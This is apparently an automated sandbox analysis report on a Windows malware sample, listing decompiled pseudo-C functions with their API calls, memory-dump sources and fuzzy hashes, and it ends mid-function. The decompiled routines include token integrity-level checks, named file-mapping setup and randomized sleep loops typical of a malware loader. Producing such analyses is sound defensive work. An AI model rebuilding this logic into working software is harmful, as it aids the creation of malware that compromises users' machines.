                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								goto L12;
                                                                                                                          							} else {
                                                                                                                          								_t60 = E04CD47D5();
                                                                                                                          								_push(0xffffffff);
                                                                                                                          								_push(0xdc3cba00);
                                                                                                                          								_push(0);
                                                                                                                          								_push( *0x4cdd280);
                                                                                                                          								L21:
                                                                                                                          								L04CDAED0();
                                                                                                                          								_v36.LowPart = _t60;
                                                                                                                          								_v32 = _t76;
                                                                                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                          								_v8.LowPart = _t64;
                                                                                                                          								__eflags = _t64;
                                                                                                                          								if(_t64 == 0) {
                                                                                                                          									goto L6;
                                                                                                                          								} else {
                                                                                                                          									goto L12;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L25:
                                                                                                                          					}
                                                                                                                          					L12:
                                                                                                                          					_t78 =  &_v92;
                                                                                                                          					_t70 = 3;
                                                                                                                          					do {
                                                                                                                          						_t54 =  *_t78;
                                                                                                                          						if(_t54 != 0) {
                                                                                                                          							HeapFree( *0x4cdd270, 0, _t54);
                                                                                                                          						}
                                                                                                                          						_t78 =  &(_t78[4]);
                                                                                                                          						_t70 = _t70 - 1;
                                                                                                                          					} while (_t70 != 0);
                                                                                                                          					CloseHandle(_v44);
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          				goto L25;
                                                                                                                          			}





























                                                                                                                          APIs
                                                                                                                          • memset.NTDLL ref: 04CD5476
                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04CD5482
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04CD54A7
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04CD54C3
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04CD54DC
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD5572
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04CD5581
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04CD55BB
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04CD53C9,?), ref: 04CD55D1
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04CD55DC
                                                                                                                            • Part of subcall function 04CD502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058B9370,00000000,?,73BCF710,00000000,73BCF730), ref: 04CD507D
                                                                                                                            • Part of subcall function 04CD502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058B93A8,?,00000000,30314549,00000014,004F0053,058B9364), ref: 04CD511A
                                                                                                                            • Part of subcall function 04CD502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04CD54EF), ref: 04CD512C
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD55EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521023985-0
                                                                                                                          • Opcode ID: ccdd666903c62eb5999a99a7b6a1b10f37be0f431b44d370c8900a0f59cdb750
                                                                                                                          • Instruction ID: 3c93aea84f0ddd5ed5785e3b9e1c95da627be73653349e75f74c2f2e417fbd96
                                                                                                                          • Opcode Fuzzy Hash: ccdd666903c62eb5999a99a7b6a1b10f37be0f431b44d370c8900a0f59cdb750
                                                                                                                          • Instruction Fuzzy Hash: 55514E75801128BFDF11EF95DC44EEEBFBAEF09720F104216F615A2190E774AA44DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD3598(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				struct _FILETIME* _v12;
                                                                                                                          				short _v56;
                                                                                                                          				struct _FILETIME* _t12;
                                                                                                                          				intOrPtr _t13;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t21;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				long _t28;
                                                                                                                          				void* _t30;
                                                                                                                          
                                                                                                                          				_t27 = __edx;
                                                                                                                          				_t12 =  &_v12;
                                                                                                                          				GetSystemTimeAsFileTime(_t12);
                                                                                                                          				_push(0x192);
                                                                                                                          				_push(0x54d38000);
                                                                                                                          				_push(_v8);
                                                                                                                          				_push(_v12);
                                                                                                                          				L04CDAECA();
                                                                                                                          				_push(_t12);
                                                                                                                          				_v12 = _t12;
                                                                                                                          				_t13 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t5 = _t13 + 0x4cde876; // 0x58b8e1e
                                                                                                                          				_t6 = _t13 + 0x4cde59c; // 0x530025
                                                                                                                          				_push(0x16);
                                                                                                                          				_push( &_v56);
                                                                                                                          				_v8 = _t27;
                                                                                                                          				L04CDABEA();
                                                                                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x4cdd2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                          				_t30 = _t17;
                                                                                                                          				if(_t30 == 0) {
                                                                                                                          					_t28 = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					if(GetLastError() == 0xb7) {
                                                                                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                          						if(_t21 == 0) {
                                                                                                                          							_t28 = GetLastError();
                                                                                                                          							if(_t28 != 0) {
                                                                                                                          								goto L6;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							 *_a4 = _t30;
                                                                                                                          							 *_a8 = _t21;
                                                                                                                          							_t28 = 0;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t28 = 2;
                                                                                                                          						L6:
                                                                                                                          						CloseHandle(_t30);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t28;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53,?,?), ref: 04CD35A4
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04CD35BA
                                                                                                                          • _snwprintf.NTDLL ref: 04CD35DF
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,04CDD2E4,00000004,00000000,00001000,?), ref: 04CD35FB
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53), ref: 04CD360D
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04CD3624
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?), ref: 04CD3645
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53), ref: 04CD364D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1814172918-0
                                                                                                                          • Opcode ID: 20732366162c946d25a3beb949325984f76b1a14ad8dc5f23c5016000c5aff88
                                                                                                                          • Instruction ID: d14a64857331d1280fda2d3e04e7f5f21d9a7768bb5394bb721eccb2339a15fb
                                                                                                                          • Opcode Fuzzy Hash: 20732366162c946d25a3beb949325984f76b1a14ad8dc5f23c5016000c5aff88
                                                                                                                          • Instruction Fuzzy Hash: 56210276A01204BBD711AB68CC09F9E37AAFB44704F144125FB06EB2D0EB70FA02CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4151(long* _a4) {
                                                                                                                          				long _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void _v16;
                                                                                                                          				long _v20;
                                                                                                                          				int _t33;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_v16 = 1;
                                                                                                                          				_v20 = 0x2000;
                                                                                                                          				if( *0x4cdd294 > 5) {
                                                                                                                          					_v16 = 0;
                                                                                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                          						_v8 = 0;
                                                                                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                          						if(_v8 != 0) {
                                                                                                                          							_t46 = E04CD75F6(_v8);
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                          								if(_t33 != 0) {
                                                                                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                          								}
                                                                                                                          								E04CD4AAB(_t46);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						CloseHandle(_v12);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *_a4 = _v20;
                                                                                                                          				return _v16;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04CD4183
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04CD41A3
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04CD41B3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04CD4203
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04CD41D6
                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04CD41DE
                                                                                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04CD41EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295030180-0
                                                                                                                          • Opcode ID: 81af46a3e423d574db999e37197f5508587d6f7817d63b91aa5f0061c44270eb
                                                                                                                          • Instruction ID: 4345306dca70e15d58fd32e572bba3150215b65d2566730cd0b1d361fc38d986
                                                                                                                          • Opcode Fuzzy Hash: 81af46a3e423d574db999e37197f5508587d6f7817d63b91aa5f0061c44270eb
                                                                                                                          • Instruction Fuzzy Hash: 0B216A79D00219FFEB009F94DC84EEEBBBAEB48304F0040A6EA11A6150C775AF05EB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37C338,000008BB), ref: 6E2ED345
                                                                                                                          • Module32FirstW.KERNEL32(6E37A050,6E37B798), ref: 6E2EDD91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFirstModuleModule32Name
                                                                                                                          • String ID: j6n$1$N
                                                                                                                          • API String ID: 1846537007-767998455
                                                                                                                          • Opcode ID: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction ID: 49d7f1dcaba074517f02aef7b9a37e0758418872f8ca569b34a950447486d15f
                                                                                                                          • Opcode Fuzzy Hash: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction Fuzzy Hash: 80F272B15049B88FCF08CF69C590A797BBAF797301B3488EAD54596785E338D588EB0C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD262F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				struct _FILETIME _v12;
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t12;
                                                                                                                          				int _t14;
                                                                                                                          				signed int _t16;
                                                                                                                          				void* _t18;
                                                                                                                          				signed int _t19;
                                                                                                                          				unsigned int _t23;
                                                                                                                          				void* _t27;
                                                                                                                          				signed int _t34;
                                                                                                                          
                                                                                                                          				_t27 = __edx;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                          				 *0x4cdd270 = _t10;
                                                                                                                          				if(_t10 != 0) {
                                                                                                                          					 *0x4cdd160 = GetTickCount();
                                                                                                                          					_t12 = E04CD1A24(_a4);
                                                                                                                          					if(_t12 == 0) {
                                                                                                                          						do {
                                                                                                                          							GetSystemTimeAsFileTime( &_v12);
                                                                                                                          							_t14 = SwitchToThread();
                                                                                                                          							_t23 = _v12.dwHighDateTime;
                                                                                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                          							_push(0);
                                                                                                                          							_push(0x13);
                                                                                                                          							_push(_t23 >> 5);
                                                                                                                          							_push(_t16);
                                                                                                                          							L04CDB02E();
                                                                                                                          							_t34 = _t14 + _t16;
                                                                                                                          							_t18 = E04CD4F23(_a4, _t34);
                                                                                                                          							_t19 = 3;
                                                                                                                          							_t26 = _t34 & 0x00000007;
                                                                                                                          							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                          						} while (_t18 == 1);
                                                                                                                          						if(E04CD27C7(_t26) != 0) {
                                                                                                                          							 *0x4cdd298 = 1; // executed
                                                                                                                          						}
                                                                                                                          						_t12 = E04CD520D(_t27); // executed
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t12 = 8;
                                                                                                                          				}
                                                                                                                          				return _t12;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD2642
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD2656
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04CD1900,?), ref: 04CD2672
                                                                                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD2678
                                                                                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04CD2695
                                                                                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD26B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E04CD520D(signed int __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				long _v12;
                                                                                                                          				CHAR* _v16;
                                                                                                                          				long _v20;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t21;
                                                                                                                          				CHAR* _t22;
                                                                                                                          				CHAR* _t25;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t32;
                                                                                                                          				CHAR* _t36;
                                                                                                                          				CHAR* _t42;
                                                                                                                          				CHAR* _t43;
                                                                                                                          				CHAR* _t44;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t51;
                                                                                                                          				CHAR* _t54;
                                                                                                                          				signed char _t56;
                                                                                                                          				intOrPtr _t58;
                                                                                                                          				signed int _t59;
                                                                                                                          				void* _t62;
                                                                                                                          				CHAR* _t65;
                                                                                                                          				CHAR* _t66;
                                                                                                                          				char* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          
                                                                                                                          				_t61 = __edx;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t21 = E04CD154A();
                                                                                                                          				if(_t21 != 0) {
                                                                                                                          					_t59 =  *0x4cdd294; // 0x4000000a
                                                                                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                          					 *0x4cdd294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                          				}
                                                                                                                          				_t22 =  *0x4cdd12c(0, 2); // executed
                                                                                                                          				_v16 = _t22;
                                                                                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                          					_t25 = E04CD21DE( &_v8,  &_v20); // executed
                                                                                                                          					_t54 = _t25;
                                                                                                                          					_t26 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					if( *0x4cdd294 > 5) {
                                                                                                                          						_t8 = _t26 + 0x4cde5cd; // 0x4d283a53
                                                                                                                          						_t27 = _t8;
                                                                                                                          					} else {
                                                                                                                          						_t7 = _t26 + 0x4cde9f9; // 0x44283a44
                                                                                                                          						_t27 = _t7;
                                                                                                                          					}
                                                                                                                          					E04CD11F4(_t27, _t27);
                                                                                                                          					_t31 = E04CD3598(_t61,  &_v20,  &_v12); // executed
                                                                                                                          					if(_t31 == 0) {
                                                                                                                          						CloseHandle(_v20);
                                                                                                                          					}
                                                                                                                          					_t62 = 5;
                                                                                                                          					if(_t54 != _t62) {
                                                                                                                          						 *0x4cdd2a8 =  *0x4cdd2a8 ^ 0x81bbe65d;
                                                                                                                          						_t32 = E04CD75F6(0x60);
                                                                                                                          						 *0x4cdd364 = _t32;
                                                                                                                          						__eflags = _t32;
                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							_push(8);
                                                                                                                          							_pop(0);
                                                                                                                          						} else {
                                                                                                                          							memset(_t32, 0, 0x60);
                                                                                                                          							_t49 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          							_t68 = _t68 + 0xc;
                                                                                                                          							__imp__(_t49 + 0x40);
                                                                                                                          							_t51 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          							 *_t51 = 0x4cde823;
                                                                                                                          						}
                                                                                                                          						_t54 = 0;
                                                                                                                          						__eflags = 0;
                                                                                                                          						if(0 == 0) {
                                                                                                                          							_t36 = RtlAllocateHeap( *0x4cdd270, 0, 0x43);
                                                                                                                          							 *0x4cdd300 = _t36;
                                                                                                                          							__eflags = _t36;
                                                                                                                          							if(_t36 == 0) {
                                                                                                                          								_push(8);
                                                                                                                          								_pop(0);
                                                                                                                          							} else {
                                                                                                                          								_t56 =  *0x4cdd294; // 0x4000000a
                                                                                                                          								_t61 = _t56 & 0x000000ff;
                                                                                                                          								_t58 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          								_t13 = _t58 + 0x4cde55a; // 0x697a6f4d
                                                                                                                          								_t55 = _t13;
                                                                                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4cdc2a7);
                                                                                                                          							}
                                                                                                                          							_t54 = 0;
                                                                                                                          							__eflags = 0;
                                                                                                                          							if(0 == 0) {
                                                                                                                          								asm("sbb eax, eax");
                                                                                                                          								E04CDA82B( ~_v8 &  *0x4cdd2a8, 0x4cdd00c); // executed
                                                                                                                          								_t42 = E04CD4C40(_t55); // executed
                                                                                                                          								_t54 = _t42;
                                                                                                                          								__eflags = _t54;
                                                                                                                          								if(_t54 != 0) {
                                                                                                                          									goto L30;
                                                                                                                          								}
                                                                                                                          								_t43 = E04CD74A5(); // executed
                                                                                                                          								__eflags = _t43;
                                                                                                                          								if(_t43 != 0) {
                                                                                                                          									__eflags = _v8;
                                                                                                                          									_t65 = _v12;
                                                                                                                          									if(_v8 != 0) {
                                                                                                                          										L29:
                                                                                                                          										_t44 = E04CD5461(_t61, _t65, _v8); // executed
                                                                                                                          										_t54 = _t44;
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									__eflags = _t65;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									_t54 = E04CD3FC2(__eflags,  &(_t65[4]));
                                                                                                                          									__eflags = _t54;
                                                                                                                          									if(_t54 == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									goto L29;
                                                                                                                          								}
                                                                                                                          								_t54 = 8;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t66 = _v12;
                                                                                                                          						if(_t66 == 0) {
                                                                                                                          							L30:
                                                                                                                          							if(_v16 == 0 || _v16 == 1) {
                                                                                                                          								 *0x4cdd128();
                                                                                                                          							}
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_t67 =  &(_t66[4]);
                                                                                                                          						do {
                                                                                                                          						} while (E04CD5AB2(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                          					}
                                                                                                                          					goto L30;
                                                                                                                          				} else {
                                                                                                                          					_t54 = _t22;
                                                                                                                          					L34:
                                                                                                                          					return _t54;
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,04CD5226,00000000,00000000), ref: 04CD1559
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04CD52A3
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • memset.NTDLL ref: 04CD52F2
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(058B9570), ref: 04CD5303
                                                                                                                            • Part of subcall function 04CD3FC2: memset.NTDLL ref: 04CD3FD7
                                                                                                                            • Part of subcall function 04CD3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04CD4019
                                                                                                                            • Part of subcall function 04CD3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04CD4024
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04CD532E
                                                                                                                          • wsprintfA.USER32 ref: 04CD535E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4246211962-0
                                                                                                                          • Opcode ID: 157a5651907394273f4ad9f454cf2e0da2d5a7c59075da1fc49e5bda10c5b418
                                                                                                                          • Instruction ID: 5e87f684d1100107748061eb23e620ae73c5c1eba2b383b95f80dddf07f730d2
                                                                                                                          • Opcode Fuzzy Hash: 157a5651907394273f4ad9f454cf2e0da2d5a7c59075da1fc49e5bda10c5b418
                                                                                                                          • Instruction Fuzzy Hash: 0E51B375E42215BBEB11AFA4DC89B7E77BAEB04714F440426E702D7180E7B8FE449B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 22%
                                                                                                                          			E04CD78E6(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _t81;
                                                                                                                          				char _t83;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t97;
                                                                                                                          				signed int _t99;
                                                                                                                          				char _t101;
                                                                                                                          				unsigned int _t102;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				char* _t107;
                                                                                                                          				signed int _t110;
                                                                                                                          				signed int _t113;
                                                                                                                          				signed int _t118;
                                                                                                                          				signed int _t122;
                                                                                                                          				intOrPtr _t124;
                                                                                                                          
                                                                                                                          				_t102 = _a8;
                                                                                                                          				_t118 = 0;
                                                                                                                          				_v20 = __eax;
                                                                                                                          				_t122 = (_t102 >> 2) + 1;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_a8 = 0;
                                                                                                                          				_t81 = E04CD75F6(_t122 << 2);
                                                                                                                          				_v16 = _t81;
                                                                                                                          				if(_t81 == 0) {
                                                                                                                          					_push(8);
                                                                                                                          					_pop(0);
                                                                                                                          					L37:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t107 = _a4;
                                                                                                                          				_a4 = _t102;
                                                                                                                          				_t113 = 0;
                                                                                                                          				while(1) {
                                                                                                                          					_t83 =  *_t107;
                                                                                                                          					if(_t83 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                          						if(_t118 != 0) {
                                                                                                                          							if(_t118 > _v8) {
                                                                                                                          								_v8 = _t118;
                                                                                                                          							}
                                                                                                                          							_a8 = _a8 + 1;
                                                                                                                          							_t118 = 0;
                                                                                                                          						}
                                                                                                                          						 *_t107 = 0;
                                                                                                                          						goto L16;
                                                                                                                          					} else {
                                                                                                                          						if(_t118 != 0) {
                                                                                                                          							L10:
                                                                                                                          							_t118 = _t118 + 1;
                                                                                                                          							L16:
                                                                                                                          							_t107 = _t107 + 1;
                                                                                                                          							_t15 =  &_a4;
                                                                                                                          							 *_t15 = _a4 - 1;
                                                                                                                          							if( *_t15 != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t113 == _t122) {
                                                                                                                          							L21:
                                                                                                                          							if(_a8 <= 0x20) {
                                                                                                                          								_push(0xb);
                                                                                                                          								L34:
                                                                                                                          								_pop(0);
                                                                                                                          								L35:
                                                                                                                          								E04CD4AAB(_v16);
                                                                                                                          								goto L37;
                                                                                                                          							}
                                                                                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                          							_t103 = E04CD75F6((_v8 + _t24) * _a8 + 4);
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_push(8);
                                                                                                                          								goto L34;
                                                                                                                          							}
                                                                                                                          							_t90 = _a8;
                                                                                                                          							_a4 = _a4 & 0x00000000;
                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                          							_t124 = _t103 + _t90 * 4;
                                                                                                                          							if(_t90 <= 0) {
                                                                                                                          								L31:
                                                                                                                          								 *0x4cdd2b0 = _t103;
                                                                                                                          								goto L35;
                                                                                                                          							}
                                                                                                                          							do {
                                                                                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                          								_v12 = _v12 & 0x00000000;
                                                                                                                          								if(_a4 <= 0) {
                                                                                                                          									goto L30;
                                                                                                                          								} else {
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L26:
